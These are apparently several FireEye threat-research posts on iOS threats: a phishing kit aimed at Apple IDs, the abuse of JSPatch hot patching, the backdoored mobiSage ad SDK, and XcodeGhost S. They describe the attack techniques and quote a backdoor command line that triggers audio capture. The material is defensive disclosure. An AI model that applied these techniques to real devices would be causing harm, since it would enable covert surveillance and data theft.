, which requests personal information such as name, date of birth, telephone numbers, addresses, credit card details and security questions, as shown in Figure 12. While filling out this form, we observed that the country part of the address drop-down menu only allowed address options from England, Scotland and Wales, suggesting that this attack is targeting these regions onlyClicking on unlock leads the user to the page profile.php .

Figure 12: User information requested by phishing page

On submitting false information on this form, the user would get a page asking to wait while the entered information is confirmed or verified. After a couple of seconds of processing, the page congratulates the user that their Apple ID was successfully unlocked (Figure 13). As seen in Figure 14, the user is then redirected to the authentic Apple page at https://Appleid.Apple[.]com/.

Figure 13: Account verification page displayed by the phishing site

Figure 14: After a successful attack, victims are redirected to the real apple login page

Domain Registration Information

It was observed that all of these domains used the whois privacy protection feature offered by many registrars. This feature enables the registrants to hide their personal and contact information which otherwise is available via the whois service. These domains were registered with the email “contact@privacyprotect[.]org

Geo-location

All these domains (Table 2) were pointing to IPs in the UK, suggesting that they were hosted in the UK.

Conclusion

Cybercriminals are targeting Apple users by launching phishing campaigns focused on stealing Apple IDs, as well as personal, financial and other information. We witnessed a high frequency of these targeted phishing attacks in the first quarter of 2016. A few phishing campaigns were particularly interesting because of their sophisticated evasion techniques (using code encoding and obfuscation), geographical targets, and because the same content was being served across multiple domains, which indicates the same phishing kits were being used.

One campaign we detected in March used sophisticated encoding/encryption techniques to evade phishing detection systems and provided a realistic looking Apple/iCloud interface. The majority of these domains were registered by individuals having email addresses pointing to Chinese services – registrant email, contact and address information points to China. Additionally, the domains were serving phony Apple webpages in Chinese, indicating that they were targeting Chinese users.

The second campaign we detected was launched against Apple users in the UK. This campaign used sophisticated evasion techniques (such as code obfuscation) to evade phishing detection systems and, whenever successful, was able to collect Apple IDs and personal and credit card information from its victims.

Organizations could use the information provided in this blog to protect their users from such sophisticated phishing campaigns by writing signatures for their phishing detection and prevention systems.

Credits and Acknowledgements

Special thanks to Yichong Lin, Jimmy Su, Mary Grace and Gaurav Dalal for their support.

Appendix 1

Figure 15: Obfuscated JavaScript served by the phishing site. In Green we have highlighted functions with: number system converters, pseudo-random pattern decoders, bit level binary operas

Figure 16: Obfuscated JS served by the phishing site. In Green we have highlighted functions with: number system converters, pseudo-random pattern decoders, bit level binary operaters. While in Red we have: XOR decoders.

Appendix 2

Figure 17: Obfuscated JavaScript content served by the site

Figure 18: Deobfuscated HTML content

For more information on phishing, please visit:

https://support.apple.com/HT203126
http://www.apple.com/legal/more-resources/phishing/
https://support.apple.com/HT204759

 

Hot or Not? The Benefits and Risks of iOS Remote Hot Patching

Introduction

Apple has made a significant effort to build and maintain a healthy and clean app ecosystem. The essential contributing component to this status quo is the App Store, which is protected by a thorough vetting process that scrutinizes all submitted applications. While the process is intended to protect iOS users and ensure apps meet Apple’s standards for security and integrity, developers who have experienced the process would agree that it can be difficult and time consuming. The same process then must be followed when publishing a new release or issuing a patched version of an existing app, which can be extremely frustrating when a developer wants to patch a severe bug or security vulnerability impacting existing app users.

The developer community has been searching for alternatives, and with some success. A set of solutions now offer a more efficient iOS app deployment experience, giving app developers the ability to update their code as they see fit and deploy patches to users’ devices immediately. While these technologies provide a more autonomous development experience, they do not meet the same security standards that Apple has attempted to maintain. Worse, these methods might be the Achilles heel to the walled garden of Apple’s App Store.

In this series of articles, FireEye mobile security researchers examine the security risks of iOS apps that employ these alternate solutions for hot patching, and seek to prevent unintended security compromises in the iOS app ecosystem.

As the first installment of this series, we look into an open source solution: JSPatch.

Episode 1. JSPatch

JSPatch is an open source project – built on top of Apple’s JavaScriptCore framework – with the goal of providing an alternative to Apple’s arduous and unpredictable review process in situations where the timely delivery of hot fixes for severe bugs is vital. In the author’s own words (bold added for emphasis):

JSPatch bridges Objective-C and JavaScript using the Objective-C runtime. You can call any Objective-C class and method in JavaScript by just including a small engine. That makes the APP obtaining the power of script language: add modules or replacing Objective-C code to fix bugs dynamically.

JSPatch Machinery

The JSPatch author, using the alias Bang, provided a common example of how JSPatch can be used to update a faulty iOS app on his blog:

Figure 1 shows an Objc implementation of a UITableViewController with class name JPTableViewController that provides data population via the selector tableView:didSelectRowAtIndexPath:. At line 5, it retrieves data from the backend source represented by an array of strings with an index mapping to the selected row number. In many cases, this functions fine; however, when the row index exceeds the range of the data source array, which can easily happen, the program will throw an exception and subsequently cause the app to crash. Crashing an app is never an appealing experience for users.

Figure 1. Buggy Objc code without JSPatch

Within the realm of Apple-provided technologies, the way to remediate this situation is to rebuild the application with updated code to fix the bug and submit the newly built app to the App Store for approval. While the review process for updated apps often takes less time than the initial submission review, the process can still be time-consuming, unpredictable, and can potentially cause loss of business if app fixes are not delivered in a timely and controlled manner.

However, if the original app is embedded with the JSPatch engine, its behavior can be changed according to the JavaScript code loaded at runtime. This JavaScript file (hxxp://cnbang.net/bugfix.JS in the above example) is remotely controlled by the app developer. It is delivered to the app through network communication.   

Figure 2 shows the standard way of setting up JSPatch in an iOS app. This code would allow download and execution of a JavaScript patch when the app starts:

Figure 2. Objc code enabling JSPatch in an app

JSPatch is indeed lightweight. In this case, the only additional work to enable it is to add seven lines of code to the application:didFiishLaunchingWithOptions: selector. Figure 3 shows the JavaScript downloaded from hxxp://cnbang.net/bugfix.JS that is used to patch the faulty code.

Figure 3. JSPatch hot patch fixing index out of bound bug in Figure 1

Malicious Capability Showcase

JSPatch is a boon to iOS developers. In the right hands, it can be used to quickly and effectively deploy patches and code updates. But in a non-utopian world like ours, we need to assume that bad actors will leverage this technology for unintended purposes. Specifically, if an attacker is able to tamper with the content of JavaScript file that is eventually loaded by the app, a range of attacks can be successfully performed against an App Store application.

Target App

We randomly picked a legitimate app [1] with JSPatch enabled from the App Store. The logistics of setting up the JSPatch platform and resources for code patching are packaged in this routine [AppDelegate excuteJSPatch:], as shown in Figure 4 [2]:

Figure 4. JSPatch setup in the targeted app

There is a sequence of flow from the app entry point (in this case the AppDelegate class) to where the JavaScript file containing updates or patch code is written to the file system. This process involves communicating with the remote server to retrieve the patch code. On our test device, we eventually found that the JavaScript patch code is hashed and stored at the location shown in Figure 5. The corresponding content is shown in Figure 6 in Base64-encoded format:

Figure 5. Location of downloaded JavaScript on test device


Figure 6. Encrypted patch content

While the target app developer has taken steps to secure this sensitive data from prying eyes by employing Base64 encoding on top of a symmetric encryption, one can easily render this attempt futile by running a few commands through Cycript. The patch code, once decrypted, is shown in Figure 7:

Figure 7. Decrypted original patch content retrieved from remote server

This is the content that gets loaded and executed by JPEngine, the component provided by the JSPatch framework embedded in the target app. To change the behavior of the running app, one simply needs to modify the content of this JavaScript blob. Below we show several possibilities for performing malicious actions that are against Apple’s App Review Guidelines. Although the examples below are from a jailbroken device, we have demonstrated that they will work on non-jailbroken devices as well.

Example 1: Load arbitrary public frameworks into app process

a.     Example public framework: /System/Library/Frameworks/Accounts.framework
b.     Private APIs used by public framework: [ACAccountStore init], [ACAccountStore allAccountTypes]

The target app discussed above, when running, loads the frameworks shown in Figure 8 into its process memory:


Figure 8. iOS frameworks loaded by the target app

Note that the list above – generated from the Apple-approved iOS app binary – does not contain Accounts.framework. Therefore, any “dangerous” or “risky” operations that rely on the APIs provided by this framework are not expected to take place. However, the JavaScript code shown in Figure 9 invalidates that assumption.

Figure 9. JavaScript patch code that loads the Accounts.framework into the app process

If this JavaScript code were delivered to the target app as a hot patch, it could dynamically load a public framework, Accounts.framework, into the running process. Once the framework is loaded, the script has full access to all of the framework’s APIs. Figure 10 shows the outcome of executing the private API [ACAccountStore allAccountTypes], which outputs 36 account types on the test device. This added behavior does not require the app to be rebuilt, nor does it require another review through the App Store.  

Figure 10. The screenshot of the console log for utilizing Accounts.framework

The above demonstration highlights a serious security risk for iOS app users and app developers. The JSPatch technology potentially allows an individual to effectively circumvent the protection imposed by the App Store review process and perform arbitrary and powerful actions on the device without consent from the users. The dynamic nature of the code makes it extremely difficult to catch a malicious actor in action. We are not providing any meaningful exploit in this blog post, but instead only pointing out the possibilities to avoid low-skilled attackers taking advantage of off-the-shelf exploits.

Example 2: Load arbitrary private frameworks into app process

a.     Example private framework: /System/Library/PrivateFrameworks/BluetoothManager.framework
b.   
Private APIs used by example framework: [BluetoothManager connectedDevices], [BluetoothDevice name]

Similar to the previous example, a malicious JSPatch JavaScript could instruct an app to load an arbitrary private framework, such as the BluetoothManager.framework, and further invoke private APIs to change the state of the device. iOS private frameworks are intended to be used solely by Apple-provided apps. While there is no official public documentation regarding the usage of private frameworks, it is common knowledge that many of them provide private access to low-level system functionalities that may allow an app to circumvent security controls put in place by the OS. The App Store has a strict policy prohibiting third party apps from using any private frameworks. However, it is worth pointing out that the operating system does not differentiate Apple apps’ private framework usage and a third party app’s private framework usage. It is simply the App Store policy that bans third party use.

With JSPatch, this restriction has no effect because the JavaScript file is not subject to the App Store’s vetting. Figure 11 shows the code for loading the BluetoothManager.framework and utilizing APIs to read and change the states of Bluetooth of the host device. Figure 12 shows the corresponding console outputs.

Figure 11. JavaScript patch code that loads the BluetoothManager.framework into the app process

 

Figure 12. The screenshot of the console log for utilizing BluetoothManager.framework

Example 3: Change system properties via private API

a.     Example dependent framework: b/System/Library/Frameworks/CoreTelephony.framework
b.    Private API used by example framework: [CTTelephonyNetworkInfo updateRadioAccessTechnology:]

Consider a target app that is built with the public framework CoreTelephony.framework. Apple documentation explains that this framework allows one to obtain information about a user’s home cellular service provider. It exposes several public APIs to developers to achieve this, but [CTTelephonyNetworkInfo updateRadioAccessTechnology:] is not one of them. However, as shown in Figure 13 and Figure 14, we can successfully use this private API to update the device cellular service status by changing the radio technology from CTRadioAccessTechnologyHSDPA to CTRadioAccessTechnologyLTE without Apple’s consent.

Figure 13. JavaScript code that changes the Radio Access Technology of the test device

 

Figure 14. Corresponding execution output of the above JavaScript code via Private API

Example 4: Access to Photo Album (sensitive data) via public APIs

a.     Example loaded framework: /System/Library/Frameworks/Photos.framework
b.     Public APIs: [PHAsset fetchAssetsWithMediaType:options:]

Privacy violations are a major concern for mobile users. Any actions performed on a device that involve accessing and using sensitive user data (including contacts, text messages, photos, videos, notes, call logs, and so on) should be justified within the context of the service provided by the app. However, Figure 15 and Figure 16 show how we can access the user’s photo album by leveraging the private APIs from built-in Photo.framework to harvest the metadata of photos. With a bit more code, one can export this image data to a remote location without the user’s knowledge.

Figure 15. JavaScript code that access the Photo Library

 

Figure 16. Corresponding output of the above JavaScript in Figure 15

Example 5: Access to Pasteboard in real time

a.     Example Framework: /System/Library/Frameworks/UIKit.framework
b
.     APIs: [UIPasteboard strings], [UIPasteboard items], [UIPasteboard string]

iOS pasteboard is one of the mechanisms that allows a user to transfer data between apps. Some security researchers have raised concerns regarding its security, since pasteboard can be used to transfer sensitive data such as accounts and credentials. Figure 17 shows a simple demo function in JavaScript that, when running on the JSPatch framework, scrapes all the string contents off the pasteboard and displays them on the console. Figure 18 shows the output when this function is injected into the target application on a device.

Figure 17. JavaScript code that scraps the pasteboard which might contain sensitive information

 

Figure 18. Console output of the scraped content from pasteboard by code in Figure 17

We have shown five examples utilizing JSPatch as an attack vector, and the potential for more is only constrained by an attacker’s imagination and creativity.

Future Attacks

Much of iOS’ native capability is dependent on C functions (for example, dlopen(), UIGetImageScreen()). Due to the fact that C functions cannot be reflectively invoked, JSPatch does not support direct Objective C to JavaScript mapping. In order to use C functions in JavaScript, an app must implement JSExtension, which packs the C function into corresponding interfaces that are further exported to JavaScript.

This dependency on additional Objective C code to expose C functions casts limitations on the ability of a malicious actor to perform operations such as taking stealth screenshots, sending and intercepting text messages without consent, stealing photos from the gallery, or stealthily recording audio. But these limitations can be easily lifted should an app developer choose to add a bit more Objective C code to wrap and expose these C functions. In fact, the JSPatch author could offer such support to app developers in the near future through more usable and convenient interfaces, granted there is enough demand. In this case, all of the above operations could become reality without Apple’s consent.

Security Impact

It is a general belief that iOS devices are more secure than mobile devices running other operating systems; however, one has to bear in mind that the elements contributing to this status quo are multi-faceted. The core of Apple’s security controls to provide and maintain a secure ecosystem for iOS users and developers is their walled garden – the App Store. Apps distributed through the App Store are significantly more difficult to leverage in meaningful attacks. To this day, two main attack vectors make up all previously disclosed attacks against the iOS platform:

1.     Jailbroken iOS devices that allow unsigned or ill-signed apps to be installed due to the disabled signature checking function. In some cases, the sandbox restrictions are lifted, which allows apps to function outside of the sandbox.

2.     App sideloading via Enterprise Certifications on non-jailbroken devices. FireEye published a series of reports that detailed attacks exploiting this attack surface, and recent reports show a continued focus on this known attack vector.

However, as we have highlighted in this report, JSPatch offers an attack vector that does not require sideloading or a jailbroken device for an attack to succeed. It is not difficult to identify that the JavaScript content, which is not subject to any review process, is a potential Achilles heel in this app development architecture. Since there are few to zero security measures to ensure the security properties of this file, the following scenarios for attacking the app and the user are conceivable:

●      Precondition: 1) App embeds JSPatch platform; 2) App Developer has malicious intentions.

○      Consequences: The app developer can utilize all the Private APIs provided by the loaded frameworks to perform actions that are not advertised to Apple or the users. Since the developer has control of the JavaScript code, the malicious behavior can be temporary, dynamic, stealthy, and evasive. Such an attack, when in place, will pose a big risk to all stakeholders involved.

○      Figure 19 demonstrates a scenario of this type of attack:

Figure 19. Threat model for JSPatch used by a malicious app developer

●      Precondition: 1) Third-party ad SDK embeds JSPatch platform; 2) Host app uses the ad SDK; 3) Ad SDK provider has malicious intention against the host app.

○      Consequences: 1) Ad SDK can exfiltrate data from the app sandbox; 2) Ad SDK can change the behavior of the host app; 3) Ad SDK can perform actions on behalf of the host app against the OS.

○      This attack scenario is shown in Figure 20:

Figure 20. Threat model for JSPatch used by a third-party library provider

The FireEye discovery of iBackdoor in 2015 is an alarming example of displaced trust within the iOS development community, and serves as a sneak peek into this type of overlooked threat.

●      Precondition: 1) App embeds JSPatch platform; 2) App Developer is legitimate; 3) App does not protect the communication from the client to the server for JavaScript content; 4) A malicious actor performs a man-in-the-middle (MITM) attack that tampers with the JavaScript content.

○      Consequences: MITM can exfiltrate app contents within the sandbox; MITM can perform actions through Private API by leveraging host app as a proxy.

○      This attack scenario is shown in Figure 21:

           Figure 21. Threat model for JSPatch used by an app targeted by MITM

Field Survey

JSPatch originated from China. Since its release in 2015, it has garnered success within the Chinese region. According to JSPatch, many popular and high profile Chinese apps have adopted this technology. FireEye app scanning found a total 1,220 apps in the App Store that utilize JSPatch.

We also found that developers outside of China have adopted this framework. On one hand, this indicates that JSPatch is a useful and desirable technology in the iOS development world. On the other hand, it signals that users are at greater risk of being attacked – particularly if precautions are not taken to ensure the security of all parties involved. Despite the risks posed by JSPatch, FireEye has not identified any of the aforementioned applications as being malicious.  

Food For Thought

Many applaud Apple’s App Store for helping to keep iOS malware at bay. While it is undeniably true that the App Store plays a critical role in winning this acclaim, it is at the cost of app developers’ time and resources.

One of the manifestations of such a cost is the app hot patching process, where a simple bug fix has to go through an app review process that subjects the developers to an average waiting time of seven days before updated code is approved. Thus, it is not surprising to see developers seeking various solutions that attempt to bypass this wait period, but which lead to unintended security risks that may catch Apple off guard.

JSPatch is one of several different offerings that provide a low-cost and streamlined patching process for iOS developers. All of these offerings expose a similar attack vector that allows patching scripts to alter the app behavior at runtime, without the constraints imposed by the App Store’s vetting process. Our demonstration of abusing JSPatch capabilities for malicious gain, as well as our presentation of different attack scenarios, highlights an urgent problem and an imperative need for a better solution – notably due to a growing number of app developers in China and beyond having adopted JSPatch.

Many developers have doubts that the App Store would accept technologies leveraging scripts such as JavaScript. According to Apple’s App Store Review Guidelines, apps that download code in any way or form will be rejected. However, the JSPatch community argues it is in compliance with Apple’s iOS Developer Program Information, which makes an exception to scripts and code downloaded and run by Apple's built-in WebKit framework or JavascriptCore, provided that such scripts and code do not change the primary purpose of the application by providing features or functionality that are inconsistent with the intended and advertised purpose of the application as submitted to the App Store.

The use of malicious JavaScript (which presumably changes the primary purpose of the application) is clearly prohibited by the App Store policy. JSPatch is walking a fine line, but it is not alone. In our coming reports, we intend to similarly examine more solutions in order to find a better solution that satisfies Apple and the developer community without jeopardizing the users security experience. Stay tuned!

 

[1] We have contacted the app provider regarding the issue. In order to protect the app vendor and its users, we choose to not disclose the identity before they have this issue addressed.
[2] The redacted part is the hardcoded decryption key.

 

iBackDoor: High-Risk Code Hits iOS Apps

Introduction

FireEye mobile researchers recently discovered potentially “backdoored” versions of an ad library embedded in thousands of iOS apps originally published in the Apple App Store. The affected versions of this library embedded functionality in iOS apps that used the library to display ads, allowing for potential malicious access to sensitive user data and device functionality. NOTE: Apple has worked with us on the issue and has since removed the affected apps.

These potential backdoors could have been controlled remotely by loading JavaScript code from a remote server to perform the following actions on an iOS device:

  • Capture audio and screenshots
  • Monitor and upload device location
  • Read/delete/create/modify files in the app’s data container
  • Read/write/reset the app’s keychain (e.g., app password storage)
  • Post encrypted data to remote servers
  • Open URL schemes to identify and launch other apps installed on the device
  • “Side-load” non-App Store apps by prompting the user to click an “Install” button

The offending ad library contained identifying data suggesting that it is a version of the mobiSage SDK [1]. We found 17 distinct versions of the potentially backdoored ad library: version codes 5.3.3 to 6.4.4. However, in the latest mobiSage SDK publicly released by adSage [2] – version 7.0.5 – the potential backdoors are not present. It is unclear whether the potentially backdoored versions of the ad library were released by adSage or if they were created and/or compromised by a malicious third party.

As of November 4, we have identified 2,846 iOS apps containing the potentially backdoored versions of mobiSage SDK. Among these, we observed more than 900 attempts to contact an ad adSage server capable of delivering JavaScript code to control the backdoors. We notified Apple of the complete list of affected apps and technical details on October 21, 2015.

While we have not observed the ad server deliver any malicious commands intended to trigger the most sensitive capabilities such as recording audio or stealing sensitive data, affected apps periodically contact the server to check for new JavaScript code. In the wrong hands, malicious JavaScript code that triggers the potential backdoors could be posted to eventually be downloaded and executed by affected apps.

Technical Details

As shown in Figure 1, the affected mobiSage library included two key components, separately implemented in Objective-C and JavaScript. The Objective-C component, which we refer to as msageCore, implements the underlying functionality of the potential backdoors and exposed interfaces to the JavaScript context through a WebView. The JavaScript component, which we refer to as msageJS, provides high-level execution logic and can trigger the potential backdoors by invoking the interfaces exposed by msageCore. Each component has its own separate version number.

Figure 1: Key components of backdoored mobiSage SDK

In the remainder of this section, we reveal internal details of msageCore, including its communication channel and high-risk interfaces. Then we describe how msageJS is launched and updated, and how it can trigger the backdoors.

Backdoors in msageCore

Communication channel

MsageCore implements a general framework to communicate with msageJS via the ad library’s WebView. Commands and parameters are passed via specially crafted URLs in the format adsagejs://cmd&parameter. As shown in the reconstructed code fragment in Figure 2, msageCore fetches the command and parameters from the JavaScript context and inserts them in its command queue.

Figure 2: Communication via URL loading in WebView

To process a command in its queue, msageCore dispatches the command, along with its parameters, to a corresponding Objective-C class and method. Figure 3 shows portions of the reconstructed command dispatching code.

Figure 3: Command dispatch in msageCore

At-risk interfaces

Each dispatched command ultimately arrives at an Objective-C class in msageCore. Table 1 shows a subset of msageCore classes and the corresponding interfaces that they expose.

msageCore Class Name

Interfaces

MSageCoreUIManagerPlugin

- captureAudio:

- captureImage:

- openMail:

- openSMS:

- openApp:

- openInAppStore:

- openCamera:

- openImagePicker:

- ...

MSageCoreLocation

- start:

- stop:

- setTimer:

- returnLocationInfo:webViewId:

- ...

MSageCorePluginFileModule

 

- createDir

- deleteDir:

- deleteFile:

- createFile:

- getFileContent:

- ...

MSageCoreKeyChain

- writeKeyValue:

- readValueByKey:

- resetValueByKey:

MSageCorePluginNetWork

- sendHttpGet:

- sendHttpPost:

- sendHttpUpload:

- ...

MSageCoreEncryptPlugin

- MD5Encrypt:

- SHA1Encrypt:

- AESEncrypt:

- AESDecrypt:

- DESEncrypt:

- DESDecrypt:

- XOREncrypt:

- XORDecrypt:

- RC4Encrypt:

- RC4Decrypt

- ...

Table 1: Selected interfaces exposed by msageCore

The selected interfaces reveal some of the key capabilities exposed by the potential backdoors in the library. They expose the potential ability to capture audio and screenshots while the affected app is in use, identify and launch other apps installed on the device, periodically monitor location, read and write files in the app’s data container, and read/write/reset “secure” keychain items stored by the app. Additionally, any data collected via these interfaces can be encrypted with various encryption schemes and uploaded to a remote server.

Beyond the selected interfaces, the ad library potentially exposed users to additional risks by including logic to promote and install “enpublic” apps as shown in Figure 4. As we have highlighted in previous blogs [footnotes 3, 4, 5, 6, 7], enpublic apps can introduce additional security risks by using private APIs in certain versions of iOS. These private APIs potentially allow for background monitoring of SMS or phone calls, breaking the app sandbox, stealing email messages, and demolishing arbitrary app installations. Apple has addressed a number of issues related to enpublic apps that we have brought to their attention.

Figure 4: Installing “enpublic” apps to bypass Apple App Store review

We can see how this ad library functions by examining the implementations of some of the selected interfaces. Figure 5 shows reconstructed code snippets for capturing audio. Before storing recorded audio to a file audio_xxx.wav, the code retrieves two parameters from the command for recording duration and threshold.

Figure 5: Capturing audio with duration and threshold

Figure 6 shows a code snippet for initializing the app’s keychain before reading. The accessed keychain is in the kSecClassGenericPassword class, which is widely used by apps for storing secret credentials such as passwords.

Figure 6: Reading the keychain in the kSecClassGenericPassword class

Remote control in msageJS

msageJS contains JavaScript code for communicating with a remote server and submitting commands to msageCore. The file layout of msageJS is shown in Figure 7. Inside sdkjs.js, we find a wrapper object called adsage and the JavaScript interface for command execution.

Figure 7: The file layout of msageJS

The command execution interface is constructed as follows:

          adsage.exec(className, methodName, argsList, onSuccess, onFailure);

The className and methodName parameters correspond to classes and methods in msageCore. The argsList parameter can be either a list or dict, and the exact types and values can be determined by reversing the methods in msageCore. The final two parameters are function callbacks invoked when the method exits. For example, the following invocation starts audio capture:

adsage.exec("MSageCoreUIManager", "captureAudio", ["Hey", 10, 40],  onSuccess, onFailure);

Note that the files comprising msageJS cannot be found by simply listing the files in an affected app’s IPA. The files themselves are zipped and encoded in Base64 in the data section of the ad library binary. After an affected app is launched, msageCore first decodes the string and extracts msageJS to the app’s data container, setting index.html shown in Figure 7 as the landing page in the ad library WebView to launch msageJS.

Figure 8: Base64 encoded JavaScript component in Zip format

When msageJS is launched, it sends a POST request to hxxp://entry.adsage.com/d/ to check for updates. The server responds with information about the latest msageJS version, including a download URL, as shown in Figure 9.

Figure 9: Server response to msageJS update request via HTTP POST

Enterprise Protection

To ensure the protection of our customers, FireEye has deployed detection rules in its Network Security (NX) and Mobile Threat Prevention (MTP) products to identify the affected apps and their network activities.

For FireEye NX customers, alerts will be generated if an employee uses an infected app while their iOS device is connected to the corporate network. FireEye MTP management customers have full visibility into high-risk apps installed on mobile devices in their deployment base. End users will receive on-device notifications of the risky app and IT administrators receive email alerts.

Conclusion

In this blog, we described an ad library that affected thousands of iOS apps with potential backdoor functionality. We revealed the internals of backdoors which could be used to trigger audio recording, capture screenshots, prompt the user to side-load other high-risk apps, and read sensitive data from the app’s keychain, among other dubious capabilities. We also showed how these potential backdoors in ad libraries could be controlled remotely by JavaScript code should their ad servers fall under malicious actors’ control.

[2] http://www.adsage.cn/
[3] https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html
[4] https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html
[5] https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html
[6] https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html
[7] https://www.virusbtn.com/virusbulletin/archive/2014/11/vb201411-Apple-without-shell

XcodeGhost S: A New Breed Hits the US

Just over a month ago, iOS users were warned of the threat to their devices by the XcodeGhost malware. Apple quickly reacted, taking down infected apps from the App Store and releasing new security features to stop malicious activities. Through continuous monitoring of our customers’ networks, FireEye researchers have found that, despite the quick response, the threat of XcodeGhost has maintained persistence and been modified.

More specifically, we found that:

  • XcodeGhost has entered into U.S. enterprises and is a persistent security risk
  • Its botnet is still partially active
  • A variant we call XcodeGhost S reveals more advanced samples went undetected

After monitoring XcodeGhost related activity for four weeks, we observed 210 enterprises with XcodeGhost-infected applications running inside their networks, generating more than 28,000 attempts to connect to the XcodeGhost Command and Control (CnC) servers -- which, while not under attacker control, are vulnerable to hijacking by threat actors. Figure 1 shows the top five countries XcodeGhost attempted to callback to during this time.

Figure 1. Top five countries XcodeGhost attempted to callback in a four-week span

The 210 enterprises we detected with XcodeGhost infections represent a wide range of industries. Figure 2 shows the top five industries affected by XcodeGhost, sorted by the percentage of callback attempts to the XcodeGhost CnC servers from inside their networks:

Figure 2: Top five industries affected based on callback attempts

Researchers have demonstrated how XcodeGhost CnC traffic can be hijacked to:

  • Distribute apps outside the App Store
  • Force browse to URL
  • Aggressively promote any app in the App Store by launching the download page directly
  • Pop-up phishing windows

Figure 3 shows the top 20 most active infected apps among 152 apps, based on data from our DTI cloud:

Figure 3: Top 20 infected apps

Although most vendors have already updated their apps on App Store, this chart indicates many users are actively using older, infected versions of various apps in the field. The version distribution varies among apps. For example, the most popular Apps 网易云音乐 and WeChat-infected versions are listed in Figure 4.

App Name

Version

Incident Count (in 3 weeks)

WeChat

6.2.5.19

2963

网易云音乐

Music 163

2.8.2

3084

2.8.3

2664

2.8.1

1227

Figure 4: Sample infected app versions

The infected iPhones are running iOS versions from 6.x.x to 9.x.x as illustrated by Figure 5. It is interesting to note that nearly 70% of the victims within our customer base remain on older iOS versions. We encourage them to update to the latest version iOS 9 as quickly as possible.

Figure 5: Distribution of iOS versions running infected apps

Some enterprises have taken steps to block the XcodeGhost DNS query within their network to cut off the communication between employees’ iPhones and the attackers’ CnC servers to protect them from being hijacked. However, until these employees update their devices and apps, they are still vulnerable to potential hijacking of the XcodeGhost CnC traffic -- particularly when outside their corporate networks.

Given the number of infected devices detected within a short period among so many U.S enterprises, we believe that XcodeGhost continues to be an ongoing threat for enterprises.

XcodeGhost Modified to Exploit iOS 9

We have worked with Apple to have all XcodeGhost and XcodeGhost S (described below) samples we have detected removed from the App Store.

XcodeGhost is planted in different versions of Xcode, including Xcode 7 (released for iOS 9 development). In the latest version, which we call XcodeGhost S, features have been added to infect iOS 9 and bypass static detection.

According to [1], Apple introduced the “NSAppTransportSecurity” approach for iOS 9 to improve client-server connection security. By default, only secure connections (https with specific ciphers) are allowed on iOS 9. Due to this limitation, previous versions of XcodeGhost would fail to connect with the CnC server by using http. However, Apple also allows developers to add exceptions (“NSAllowsArbitraryLoads”) in the app’s Info.plist to allow http connection. As shown in Figure 6, the XcodeGhost S sample reads the setting of “NSAllowsArbitraryLoads” under the “NSAppTransportSecurity” entry in the app’s Info.plist and picks different CnC servers (http/https) based on this setting.

Figure 6: iOS 9 adoption in XcodeGhost S

Further, the CnC domain strings are concatenated character by character to bypass the static detection in XcodeGhost S, such behavior is shown in Figure 7.

Figure 7: Construct the CnC domain character by character

The FireEye iOS dynamic analysis platform has successfully detected an app  (“自由邦”)  [2] infected by XcodeGhost S and this app has been taken down from App Store in cooperation with Apple. It is a shopping app for travellers and is available on both U.S. and CN App Stores. As shown in Figure 8, the infected app’s version is 2.6.6, updated on Sep. 15.

Figure 8: An App Store app is infected with XcodeGhost S

Enterprise Protection

FireEye MTP has detected and assisted in Apple’s takedown of thousands of XcodeGhost-infected iOS applications. We advise all organizations to notify their employees of the threat of XcodeGhost and other malicious iOS apps. Employees should make sure that they update all apps to the latest version. For the apps Apple has removed, users should remove the apps and switch to other uninfected apps on App Store.

FireEye MTP management customers have full visibility into which mobile devices are infected in their deployment base. We recommend that customers immediately review MTP alerts, locate infected devices/users, and quarantine the devices until the infected apps are removed. FireEye NX customers are advised to immediately review alert logs for activities related to XcodeGhost communications.

[1] https://developer.apple.com/library/prerelease/ios/technotes/App-Transport-Security-Technote/
[2] https://itunes.apple.com/us/app/id915233927
[3] http://drops.wooyun.org/papers/9024
[4] https://itunes.apple.com/us/app/pdf-reader-annotate-scan-sign/id368377690?mt=8
[5] https://itunes.apple.com/us/app/winzip-leading-zip-unzip-cloud/id500637987?mt=8
[7] https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html
[8] https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html
[9] https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html
[10] https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html

iBackDoor: High-risk Code Sneaks into the App Store

The library embeds backdoors in unsuspecting apps that make use of it to display ads, exposing sensitive data and functionality. The backdoors can be controlled remotely by loading JavaScript code from remote servers to perform the following actions:

  • Capture audio and screenshots.
  • Monitor and upload device location.
  • Read/delete/create/modify files in the app’s data container.
  • Read/Write/Reset the app’s keychain (e.g., app password storage).
  • Post encrypted data to remote servers.
  • Open URL schemes to identify and launch other apps installed on the device.
  • “Side-load” non-App Store apps by prompting the user to click an “Install” button.

The offending ad library contains identifying data suggesting that it is a version of the mobiSage SDK [1]. We found 17 distinct versions of the backdoored ad library, with version codes between 5.3.3 and 6.4.4. However, in the latest mobiSage SDK publicly released by adSage [2], identified as version 7.0.5, the backdoors are not present. We cannot determine with certainty whether the backdoored versions of the library were actually released by adSage, or whether they were created and/or compromised by a third party.

As of publication of this blog, we have identified 2846 apps published in the App Store containing backdoored versions of mobiSage SDK. Among these 2846 apps, we have observed over 900 attempt to contact their command and control (C2) server. We have notified Apple and provided the details to them.

These backdoors can be controlled not only by the original creators of the ad library, but potentially also by outside threat actors. While we have not observed commands from the C2 server intended to trigger the most sensitive capabilities such recording audio or stealing sensitive data, there are several ways that the backdoors could be abused by third-party targeted attackers to further compromise the security and privacy of the device and user:

  • An attacker could reverse-engineer the insecure HTTP-based control protocol between the ad library and its server, and then hijack the connection to insert commands to trigger the backdoors and steal sensitive information.
  • A malicious app developer can similarly inject commands, utilizing the library’s backdoors to build their own surveillance app. Since the ad library has passed the App Store review process in numerous apps, this is an attractive way to create an app with these hidden behaviors that will pass under Apple’s radar.

App Store Protections Ineffective

